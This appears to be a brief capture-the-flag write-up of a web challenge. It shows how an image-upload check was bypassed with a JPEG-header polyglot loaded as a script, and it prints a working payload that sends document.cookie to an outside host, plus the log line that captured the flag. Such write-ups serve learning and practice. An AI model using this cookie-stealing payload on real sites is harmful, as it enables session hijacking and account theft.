This is a web challenge. There is an XSS flaw in the website and one needs to steal the cookie from the website owner because it has the flag in it. The owner accesses the site everytime a new picture is sent :)
In the website we are able to upload a picture and select if this picture will be presented using the <img> tag or the <script> tag by chaging the value of the “tag” POST variable.
The website is validating if the image sent is really an image (it will check the image data to make sure that the file being uploaded is not a script or something).
So, what we need to do is to bypass the checking for the image that is made on the server side and have this image to be interpreted.
Very cool, so with this I have created the following payload:
echo -en "\xff\xd8\xff\xf8=1;img=new Image();img.src='http://www.gilgalab.com.br/?cookie='+document.cookie;" > xpto2.jpg
After that all I had to do was to upload the image and set the “tag” field to “script” and check the apache logs!
18.104.22.168 - - [09/Jun/2013:00:43:27 +0000] "GET /?cookie=flag=didnt_need_script_tags_on_ie6 HTTP/1.1" 200 2476 "http://localhost/gallery/63330c986a4daffe2c4cec548945de1b5ee456c2/upload.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0"
So the flag is flag=didnt_need_script_tags_on_ie6
Nice challenge :)